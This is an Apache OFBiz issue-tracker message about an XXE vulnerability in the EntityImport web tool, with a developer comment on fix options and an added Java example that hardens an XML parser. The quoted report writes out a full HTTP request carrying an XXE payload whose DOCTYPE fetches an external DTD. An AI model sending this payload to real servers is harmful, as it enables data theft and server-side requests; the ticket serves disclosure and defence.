[ https://issues.apache.org/jira/browse/OFBIZ-12304?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17525612#comment-17525612 ]
Jacques Le Roux commented on OFBIZ-12304:
-----------------------------------------

Hi Michael,

The security reporter provided an "http packet" that can be used to create a Man In the Middle attack using a tool like Burp. I agree with the rest.

There are 2 options:
# We could do something like I did for OFBIZ-12602: allow users with the appropriate permissions to use the entity import without this restriction. I have only 1 problem with this solution: what to say to a security reporter who reports a similar issue? I suggest we could simply reject them, explaining why, i.e. needed.
# As you suggested, do the same as point 1 but with a property set to false OOTB.

What do you think? Maybe it would be better to discuss that in dev ML? Not sure it's necessary ;)

> Found a new XXE (XML External Entity Injection) vulnerability in EntityImport
> -----------------------------------------------------------------------------
>
>                 Key: OFBIZ-12304
>                 URL: https://issues.apache.org/jira/browse/OFBIZ-12304
>             Project: OFBiz
>          Issue Type: Sub-task
>          Components: framework/webtools
>    Affects Versions: 17.12.08
>            Reporter: thiscodecc
>            Assignee: Jacques Le Roux
>            Priority: Major
>             Fix For: Release Branch 17.12, 18.12.01
>
>
> The http packet is as follows:
>
> POST /webtools/control/entityImport HTTP/1.1
> Host: 127.0.0.1:8443
> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:91.0) Gecko/20100101 Firefox/91.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
> Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
> Accept-Encoding: gzip, deflate
> Referer: https://127.0.0.1:8443/webtools/control/EntityImport
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 174
> Origin: https://127.0.0.1:8443
> Connection: close
> Cookie: JSESSIONID=BC833071F17F30BE022A7D44A5BB78C5.jvm1; OFBiz.Visitor=10103; CookiePreferences=[]; login_username=admin; login_nickname=admin; UM_distinctid=178a633ad075a3-0853063891be59-445b6f-13c680-178a633ad087e9; displayTagDiv=false; Hm_lvt_e325e60ca4cd358f2b424f5aecb8021a=1621261771; careyshop-1.8.4-uuid=admin; careyshop-1.8.4-block=false
> Upgrade-Insecure-Requests: 1
> Sec-Fetch-Dest: document
> Sec-Fetch-Mode: navigate
> Sec-Fetch-Site: same-origin
> Sec-Fetch-User: ?1
>
> fulltext=<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE Quan SYSTEM "http://127.0.0.1:12311/vlab.dtd"><xml-body></xml-body>

--
This message was sent by Atlassian Jira
(v8.20.7#820007)
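The payload in the quoted report is nothing more than an external DOCTYPE reference, which is exactly what a hardened JAXP configuration refuses before the parser ever opens a connection to the attacker's DTD host. The following is an added example written for this page, not OFBiz code and not part of the ticket: a DocumentBuilder factory that disallows DOCTYPE declarations and external entities by default, with a hypothetical `allowExternalEntities` switch standing in for the permission check (option 1) or the OOTB-false property (option 2) discussed in the comment. The class name `XxeSafeImportParser`, the switch and the benign document are assumptions of this example; the `payload` string is the `fulltext` value from the report.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;

import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;

import org.w3c.dom.Document;
import org.xml.sax.SAXException;

/**
 * Added example (not OFBiz code): a JAXP DocumentBuilder that is hardened
 * against XXE by default and only loosened for an explicitly trusted caller.
 */
public final class XxeSafeImportParser {

    // Xerces feature URIs understood by the JDK's built-in parser.
    private static final String DISALLOW_DOCTYPE =
        "http://apache.org/xml/features/disallow-doctype-decl";
    private static final String EXTERNAL_GENERAL_ENTITIES =
        "http://xml.org/sax/features/external-general-entities";
    private static final String EXTERNAL_PARAMETER_ENTITIES =
        "http://xml.org/sax/features/external-parameter-entities";
    private static final String LOAD_EXTERNAL_DTD =
        "http://apache.org/xml/features/nonvalidating/load-external-dtd";

    /**
     * @param allowExternalEntities hypothetical switch standing in for the
     *        permission check / "property set to false OOTB" discussed in the
     *        ticket; false is the safe default and must be the shipped default.
     */
    public static DocumentBuilder newBuilder(boolean allowExternalEntities)
            throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        if (!allowExternalEntities) {
            // Reject any <!DOCTYPE ...> outright: with no internal or external
            // DTD there is nothing to fetch and no entity to expand.
            f.setFeature(DISALLOW_DOCTYPE, true);
            // Belt and braces in case a parser implementation ignores the above.
            f.setFeature(EXTERNAL_GENERAL_ENTITIES, false);
            f.setFeature(EXTERNAL_PARAMETER_ENTITIES, false);
            f.setFeature(LOAD_EXTERNAL_DTD, false);
            f.setXIncludeAware(false);
            f.setExpandEntityReferences(false);
        }
        return f.newDocumentBuilder();
    }

    /** Parse an in-memory XML string with the hardened (or trusted) builder. */
    public static Document parse(String xml, boolean allowExternalEntities)
            throws ParserConfigurationException, SAXException, IOException {
        return newBuilder(allowExternalEntities)
            .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
    }

    public static void main(String[] args) throws Exception {
        // The fulltext value from the report, constructed here as a Java string.
        String payload = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
            + "<!DOCTYPE Quan SYSTEM \"http://127.0.0.1:12311/vlab.dtd\">"
            + "<xml-body></xml-body>";
        // Constructed benign document: no DOCTYPE, so it must still parse.
        String benign = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><xml-body/>";

        try {
            parse(payload, false);
            System.out.println("UNEXPECTED: payload accepted");
        } catch (SAXException e) {
            // The parser fails on the DOCTYPE before any request to vlab.dtd.
            System.out.println("rejected: " + e.getMessage());
        }
        System.out.println("benign root: "
            + parse(benign, false).getDocumentElement().getTagName());
    }
}
```

With the default `false` path, the `DISALLOW_DOCTYPE` feature makes the JDK parser throw a `SAXParseException` on the `<!DOCTYPE Quan SYSTEM ...>` declaration, so the request in the report never triggers the outbound fetch to 127.0.0.1:12311 that a blind XXE relies on. The `true` path only drops those restrictions for a caller the application has already decided to trust (the permission or property from the two options in the comment); it is still subject to whatever limits `FEATURE_SECURE_PROCESSING` imposes on the running JDK, so a deployment that genuinely needs external DTDs should verify that behaviour on its own JDK version rather than assume it.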